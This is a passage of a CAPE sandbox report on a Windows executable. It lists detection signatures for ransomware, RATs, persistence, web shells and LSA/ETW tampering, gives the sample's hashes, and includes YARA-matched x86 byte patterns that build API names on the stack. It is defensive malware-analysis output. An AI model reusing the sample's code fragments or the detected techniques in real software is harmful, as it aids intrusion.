"packer_armadillo_mutex", "time": 0.0 }, { "name": "packer_armadillo_regkey", "time": 0.0 }, { "name": "persistence_ads", "time": 0.0 }, { "name": "persistence_safeboot", "time": 0.0 }, { "name": "persistence_ifeo", "time": 0.0 }, { "name": "persistence_silent_process_exit", "time": 0.0 }, { "name": "persistence_rdp_registry", "time": 0.0 }, { "name": "persistence_rdp_shadowing", "time": 0.0 }, { "name": "persistence_service", "time": 0.0 }, { "name": "persistence_shim_database", "time": 0.0 }, { "name": "powerpool_mutexes", "time": 0.0 }, { "name": "powershell_scriptblock_logging", "time": 0.0 }, { "name": "powershell_command_suspicious", "time": 0.0 }, { "name": "powershell_renamed", "time": 0.0 }, { "name": "powershell_reversed", "time": 0.0 }, { "name": "powershell_variable_obfuscation", "time": 0.0 }, { "name": "prevents_safeboot", "time": 0.0 }, { "name": "cmdline_process_discovery", "time": 0.0 }, { "name": "cryptomix_mutexes", "time": 0.0 }, { "name": "dharma_mutexes", "time": 0.0 }, { "name": "ransomware_extensions", "time": 0.001 }, { "name": "ransomware_files", "time": 0.002 }, { "name": "fonix_mutexes", "time": 0.0 }, { "name": "gandcrab_mutexes", "time": 0.0 }, { "name": "germanwiper_mutexes", "time": 0.0 }, { "name": "medusalocker_mutexes", "time": 0.0 }, { "name": "medusalocker_regkeys", "time": 0.0 }, { "name": "nemty_mutexes", "time": 0.0 }, { "name": "nemty_regkeys", "time": 0.0 }, { "name": "pysa_mutexes", "time": 0.0 }, { "name": "ransomware_radamant", "time": 0.0 }, { "name": "ransomware_recyclebin", "time": 0.0 }, { "name": "revil_mutexes", "time": 0.0 }, { "name": "ransomware_revil_regkey", "time": 0.0 }, { "name": "satan_mutexes", "time": 0.0 }, { "name": "snake_ransom_mutexes", "time": 0.0 }, { "name": "stop_ransom_mutexes", "time": 0.0 }, { "name": "stop_ransomware_cmd", "time": 0.0 }, { "name": "ransomware_stopdjvu", "time": 0.0 }, { "name": "rat_beebus_mutexes", "time": 0.0 }, { "name": "blacknet_mutexes", "time": 0.0 }, { "name": "blackrat_mutexes", "time": 0.0 }, { "name": "crat_mutexes", "time": 0.0 }, { "name": "dcrat_files", "time": 0.0 }, { "name": "dcrat_mutexes", "time": 0.0 }, { "name": "rat_fynloski_mutexes", "time": 0.0 }, { "name": "limerat_mutexes", "time": 0.0 }, { "name": "limerat_regkeys", "time": 0.0 }, { "name": "lodarat_file_behavior", "time": 0.0 }, { "name": "modirat_behavior", "time": 0.0 }, { "name": "njrat_regkeys", "time": 0.0 }, { "name": "obliquerat_files", "time": 0.0 }, { "name": "obliquerat_mutexes", "time": 0.0 }, { "name": "parallax_mutexes", "time": 0.0 }, { "name": "rat_pcclient", "time": 0.0 }, { "name": "rat_plugx_mutexes", "time": 0.0 }, { "name": "rat_poisonivy_mutexes", "time": 0.0 }, { "name": "rat_quasar_mutexes", "time": 0.0 }, { "name": "ratsnif_mutexes", "time": 0.0 }, { "name": "rat_spynet", "time": 0.0 }, { "name": "venomrat_mutexes", "time": 0.0 }, { "name": "warzonerat_files", "time": 0.0 }, { "name": "warzonerat_regkeys", "time": 0.0 }, { "name": "xpertrat_files", "time": 0.0 }, { "name": "xpertrat_mutexes", "time": 0.0 }, { "name": "rat_xtreme_mutexes", "time": 0.0 }, { "name": "recon_fingerprint", "time": 0.0 }, { "name": "remcos_files", "time": 0.0 }, { "name": "remcos_mutexes", "time": 0.0 }, { "name": "remcos_regkeys", "time": 0.0 }, { "name": "rdptcp_key", "time": 0.0 }, { "name": "uses_rdp_clip", "time": 0.0 }, { "name": "uses_remote_desktop_session", "time": 0.0 }, { "name": "removes_networking_icon", "time": 0.0 }, { "name": "removes_pinned_programs", "time": 0.0 }, { "name": "removes_security_maintenance_icon", "time": 0.0 }, { "name": "removes_startmenu_defaults", "time": 0.0 }, { "name": "removes_username_startmenu", "time": 0.0 }, { "name": "spicyhotpot_behavior", "time": 0.0 }, { "name": "sniffer_winpcap", "time": 0.0 }, { "name": "spreading_autoruninf", "time": 0.0 }, { "name": "stealth_hidden_extension", "time": 0.0 }, { "name": "stealth_hiddenreg", "time": 0.0 }, { "name": "stealth_hide_notifications", "time": 0.0 }, { "name": "stealth_webhistory", "time": 0.0 }, { "name": "sysinternals_psexec", "time": 0.0 }, { "name": "sysinternals_tools", "time": 0.0 }, { "name": "tampers_etw", "time": 0.0 }, { "name": "lsa_tampering", "time": 0.0 }, { "name": "tampers_powershell_logging", "time": 0.0 }, { "name": "targeted_flame", "time": 0.0 }, { "name": "territorial_disputes_sigs", "time": 0.007 }, { "name": "trickbot_mutex", "time": 0.0 }, { "name": "fleercivet_mutex", "time": 0.0 }, { "name": "lokibot_mutexes", "time": 0.0 }, { "name": "ursnif_behavior", "time": 0.0 }, { "name": "uses_adfind", "time": 0.0 }, { "name": "uses_ms_protocol", "time": 0.0 }, { "name": "neshta_mutexes", "time": 0.0 }, { "name": "renamer_mutexes", "time": 0.0 }, { "name": "owa_web_shell_files", "time": 0.0 }, { "name": "web_shell_files", "time": 0.0 }, { "name": "web_shell_processes", "time": 0.0 }, { "name": "dotnet_csc_build", "time": 0.0 }, { "name": "multiple_explorer_instances", "time": 0.0 }, { "name": "script_tool_executed", "time": 0.0 }, { "name": "suspicious_certutil_use", "time": 0.0 }, { "name": "suspicious_command_tools", "time": 0.001 }, { "name": "suspicious_mpcmdrun_use", "time": 0.0 }, { "name": "suspicious_ping_use", "time": 0.0 }, { "name": "uses_powershell_copyitem", "time": 0.0 }, { "name": "uses_windows_utilities", "time": 0.001 }, { "name": "uses_windows_utilities_appcmd", "time": 0.0 }, { "name": "uses_windows_utilities_csvde_ldifde", "time": 0.0 }, { "name": "uses_windows_utilities_cipher", "time": 0.0 }, { "name": "uses_windows_utilities_clickonce", "time": 0.0 }, { "name": "uses_windows_utilities_curl", "time": 0.0 }, { "name": "uses_windows_utilities_dsquery", "time": 0.0 }, { "name": "uses_windows_utilities_esentutl", "time": 0.0 }, { "name": "uses_windows_utilities_finger", "time": 0.0 }, { "name": "uses_windows_utilities_mode", "time": 0.0 }, { "name": "uses_windows_utilities_ntdsutil", "time": 0.0 }, { "name": "uses_windows_utilities_nltest", "time": 0.0 }, { "name": "uses_windows_utilities_xcopy", "time": 0.0 }, { "name": "wmic_command_suspicious", "time": 0.0 }, { "name": "scrcons_wmi_script_consumer", "time": 0.0 }, { "name": "allaple_mutexes", "time": 0.0 } ], "reporting": [ { "name": "BinGraph", "time": 0.0 }, { "name": "CAPASummary", "time": 1.501 }, { "name": "MITRE_TTPS", "time": 0.009 }, { "name": "PCAP2CERT", "time": 0.0 } ] }, "target": { "category": "file", "file": { "name": "f1e62c0e7345fc825586.exe", "path": "/opt/CAPEv2/storage/binaries/f1e62c0e7345fc825586f84330908165e28e70b1126301b9763727dfb9a178ce", "guest_paths": "", "size": 3015494, "crc32": "8F816E20", "md5": "03b8a2ae02674534f3d3cdea55c990ab", "sha1": "078993c4719af77d95fc392756b5ab0a422f9864", "sha256": "f1e62c0e7345fc825586f84330908165e28e70b1126301b9763727dfb9a178ce", "sha512": "d6bb334be8472f77981187087ea8947b2f928f18d7b5eb74ed23054a0305008621e3d642cc35ce9070dde601fb3a0354eb973c0cd84ddece73c72cc4a1f01ba1", "rh_hash": null, "ssdeep": "24576:3Ty7A3mZZcVKfIxTiEVc847flVC6faaQDbGV6eH81k6IbGD2JTu0GoZQDbGV6eHq:3Ty7A3mw4gxeOw46fUbNecCCFbNecX", "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "yara": [ { "name": "shellcode_stack_strings", "meta": { "author": "William Ballenthin", "email": "william.ballenthin@fireeye.com", "license": "Apache 2.0", "copyright": "FireEye, Inc", "description": "Match x86 that appears to be stack string creation." }, "strings": [ "{ C6 45 F3 32 C6 45 F4 2E C6 45 F5 64 C6 45 F6 6C C6 45 F7 6C C6 45 F8 00 }", "{ C6 45 F4 2E C6 45 F5 64 C6 45 F6 6C C6 45 F7 6C C6 45 F8 00 }", "{ C6 45 8B 32 C6 45 8C 2E C6 45 8D 64 C6 45 8E 6C C6 45 8F 6C C6 45 90 00 }", "{ C6 45 8C 2E C6 45 8D 64 C6 45 8E 6C C6 45 8F 6C C6 45 90 00 }", "{ C6 45 B4 55 C6 45 B5 41 C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }", "{ C6 45 B5 41 C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }", "{ C6 45 B6 43 C6 45 B7 4D C6 45 B8 75 C6 45 B9 74 C6 45 BA 00 }", "{ C6 85 A0 FE FF FF 6E C6 85 A1 FE FF FF 74 C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A1 FE FF FF 74 C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A2 FE FF FF 64 C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A3 FE FF FF 6C C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A4 FE FF FF 6C C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 A5 FE FF FF 2E C6 85 A6 FE FF FF 64 C6 85 A7 FE FF FF 6C C6 85 A8 FE FF FF 6C C6 85 A9 FE FF FF 00 }", "{ C6 85 76 FE FF FF 32 C6 85 77 FE FF FF 2E C6 85 78 FE FF FF 64 C6 85 79 FE FF FF 6C C6 85 7A FE FF FF 6C C6 85 7B FE FF FF 00 }", "{ C6 85 77 FE FF FF 2E C6 85 78 FE FF FF 64 C6 85 79 FE FF FF 6C C6 85 7A FE FF FF 6C C6 85 7B FE FF FF 00 }", "{ C6 85 58 FE FF FF 70 C6 85 59 FE FF FF 73 C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 59 FE FF FF 73 C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 5A FE FF FF 61 C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 5B FE FF FF 70 C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 5C FE FF FF 69 C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 5D FE FF FF 2E C6 85 5E FE FF FF 64 C6 85 5F FE FF FF 6C C6 85 60 FE FF FF 6C C6 85 61 FE FF FF 00 }", "{ C6 85 77 FA FF FF 32 C6 85 78 FA FF FF 53 C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 78 FA FF FF 53 C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 79 FA FF FF 6E C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 7A FA FF FF 61 C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 7B FA FF FF 70 C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 7C FA FF FF 73 C6 85 7D FA FF FF 68 C6 85 7E FA FF FF 6F C6 85 7F FA FF FF 74 C6 85 80 FA FF FF 00 }", "{ C6 85 AC FC FF FF 32 C6 85 AD FC FF FF 46 C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }", "{ C6 85 AD FC FF FF 46 C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }", "{ C6 85 AE FC FF FF 69 C6 85 AF FC FF FF 72 C6 85 B0 FC FF FF 73 C6 85 B1 FC FF FF 74 C6 85 B2 FC FF FF 00 }", "{ C6 85 0B FD FF FF 32 C6 85 0C FD FF FF 46 C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }", "{ C6 85 0C FD FF FF 46 C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }", "{ C6 85 0D FD FF FF 69 C6 85 0E FD FF FF 72 C6 85 0F FD FF FF 73 C6 85 10 FD FF FF 74 C6 85 11 FD FF FF 00 }", "{ C6 85 7D FE FF FF 6C C6 85 7E FE FF FF 6F C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 7E FE FF FF 6F C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 7F FE FF FF 62 C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 80 FE FF FF 61 C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 81 FE FF FF 6C C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 82 FE FF FF 41 C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 83 FE FF FF 6C C6 85 84 FE FF FF 6C C6 85 85 FE FF FF 6F C6 85 86 FE FF FF 63 C6 85 87 FE FF FF 00 }", "{ C6 85 3F FB FF FF 6E C6 85 40 FB FF FF 49 C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 40 FB FF FF 49 C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 41 FB FF FF 6E C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 42 FB FF FF 66 C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 43 FB FF FF 6F C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 44 FB FF FF 72 C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 45 FB FF FF 6D C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 46 FB FF FF 61 C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 47 FB FF FF 74 C6 85 48 FB FF FF 69 C6 85 49 FB FF FF 6F C6 85 4A FB FF FF 6E C6 85 4B FB FF FF 00 }", "{ C6 85 64 FE FF FF 45 C6 85 65 FE FF FF 71 C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 65 FE FF FF 71 C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 66 FE FF FF 75 C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 67 FE FF FF 61 C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 68 FE FF FF 6C C6 85 69 FE FF FF 53 C6 85 6A FE FF FF 69 C6 85 6B FE FF FF 64 C6 85 6C FE FF FF 00 }", "{ C6 85 B0 FB FF FF 4C C6 85 B1 FB FF FF 6F C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B1 FB FF FF 6F C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B2 FB FF FF 6F C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B3 FB FF FF 6B C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B4 FB FF FF 75 C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B5 FB FF FF 70 C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B6 FB FF FF 41 C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B7 FB FF FF 63 C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B8 FB FF FF 63 C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 B9 FB FF FF 6F C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 BA FB FF FF 75 C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 BB FB FF FF 6E C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 BC FB FF FF 74 C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 BD FB FF FF 53 C6 85 BE FB FF FF 69 C6 85 BF FB FF FF 64 C6 85 C0 FB FF FF 41 C6 85 C1 FB FF FF 00 }", "{ C6 85 59 FB FF FF 63 C6 85 5A FB FF FF 74 C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }", "{ C6 85 5A FB FF FF 74 C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }", "{ C6 85 5B FB FF FF 6F C6 85 5C FB FF FF 72 C6 85 5D FB FF FF 79 C6 85 5E FB FF FF 41 C6 85 5F FB FF FF 00 }", "{ C6 85 31 FB FF FF 63 C6 85 32 FB FF FF 74 C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }", "{ C6 85 32 FB FF FF 74 C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }", "{ C6 85 33 FB FF FF 6F C6 85 34 FB FF FF 72 C6 85 35 FB FF FF 79 C6 85 36 FB FF FF 57 C6 85 37 FB FF FF 00 }", "{ C6 85 B1 FA FF FF 72 C6 85 B2 FA FF FF 50 C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }", "{ C6 85 B2 FA FF FF 50 C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }", "{ C6 85 B3 FA FF FF 61 C6 85 B4 FA FF FF 74 C6 85 B5 FA FF FF 68 C6 85 B6 FA FF FF 41 C6 85 B7 FA FF FF 00 }", "{ C6 85 C9 FA FF FF 72 C6 85 CA FA FF FF 50 C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }", "{ C6 85 CA FA FF FF 50 C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }", "{ C6 85 CB FA FF FF 61 C6 85 CC FA FF FF 74 C6 85 CD FA FF FF 68 C6 85 CE FA FF FF 57 C6 85 CF FA FF FF 00 }", "{ C6 85 1D FD FF FF 79 C6 85 1E FD FF FF 45 C6 85 1F FD FF FF 78 C6 85 20 FD FF FF 41 C6 85 21 FD FF FF 00 }", "{ C6 85 2D FD FF FF 79 C6 85 2E FD FF FF 45 C6 85 2F FD FF FF 78 C6 85 30 FD FF FF 57 C6 85 31 FD FF FF 00 }", "{ C6 85 0B FC FF FF 74 C6 85 0C FC FF FF 6F C6 85 0D FC FF FF 72 C6 85 0E FC FF FF 79 C6 85 0F FC FF FF 57 C6 85 10 FC FF FF 00 }", "{ C6 85 0C FC FF FF 6F C6 85 0D FC FF FF 72 C6 85 0E FC FF FF 79 C6 85 0F FC FF FF 57 C6 85 10 FC FF FF 00 }", "{ C6 85 48 FD FF FF 56 C6 85 49 FD FF FF 69 C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 54 FD FF FF 00 }", "{ C6 85 49 FD FF FF 69 C6 85 4A FD FF FF 72 C6 85 4B FD FF FF 74 C6 85 4C FD FF FF 75 C6 85 4D FD FF FF 61 C6 85 4E FD FF FF 6C C6 85 4F FD FF FF 41 C6 85 50 FD FF FF 6C C6 85 51 FD FF FF 6C C6 85 52 FD FF FF 6F C6 85 53 FD FF FF 63 C6 85 